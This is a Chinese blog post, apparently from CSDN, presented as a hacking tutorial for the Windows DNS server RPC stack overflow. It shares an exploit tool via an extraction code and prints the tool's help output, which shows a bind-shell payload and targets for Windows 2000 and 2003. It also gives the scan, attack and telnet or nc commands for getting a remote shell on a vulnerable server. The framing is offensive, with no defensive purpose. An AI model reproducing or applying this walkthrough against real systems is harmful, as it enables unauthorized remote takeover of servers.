win10黑客教学(1)--dns溢出

DNS 解析中的漏洞可能允许远程代码执行。
Microsoft Windows 是微软发布的非常流行的操作系统。
Microsoft Windows DNS 服务器的 RPC 接口在处理畸形请求时存在栈溢出漏洞,远程
攻击者可能利用此漏洞获取服务器的管理权限。
如果远程攻击者能够向有漏洞的系统发送特制的 RPC 报文的话,就可以触发这个溢
出,导致以 DNS 服务的安全环境执行任意指令

dns溢出工具
提取码:yo0i

使用时候在cmd里cd到目录下面,然后输入

dns

就可以看到帮助

[.] - UnQuoteIt 006 RC1 - ENJOY - DRIVE WITH CAUTION- Anti-dep version
[*] - bind shell payload  selected (317 bytes) port:1100 addr:0.0.0.0
[.] - dns options host [port]
       example: dns -t2000all 1.2.3.4 1030
       Use -s to scan for the target's port: dns -s 1.2.3.4
[.] - List of known targets:
    name     : description
    2000all  : Windows 2000 +SP4
    2003eng  : EN Windows 2003 Std Ed +SP1
    2003chs  : CN Windows 2003 Std Ed +SP1
    2003cht  : TW Windows 2003 Std Ed +SP1
    2003jpn  : JP Windows 2003 Std Ed +SP1
    2003kor  : KR Windows 2003 Std Ed +SP1

首先,关闭主机的专用防火墙,把虚拟机的windows切换为桥接模式,虚拟机也关闭专用防火墙,然后互相ping发现可以ping通
并且windows要先安装dns服务器
win10里可以这样安装
设置->应用->应用和功能->可选应用找到
dns并且安装,安装后在cmd里输入dnscmd如果可以看到有帮助就说明成功了

版本比较老了,都是老的漏洞,我就实验不了了,大家有条件的话可以自己实验
大致的流程是这样的

dns -s ip地址

探测开放的端口

dns -t2000all ip 端口

dns加上漏洞加上ip加上端口进行攻击
当利用工具提示溢出成功以后,就可以利用 telnet 命令或程序 nc 连接存在漏洞的服务器中对应的 端口,比如

 telnet ip 端口

就可以得到远程主机的 shell。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值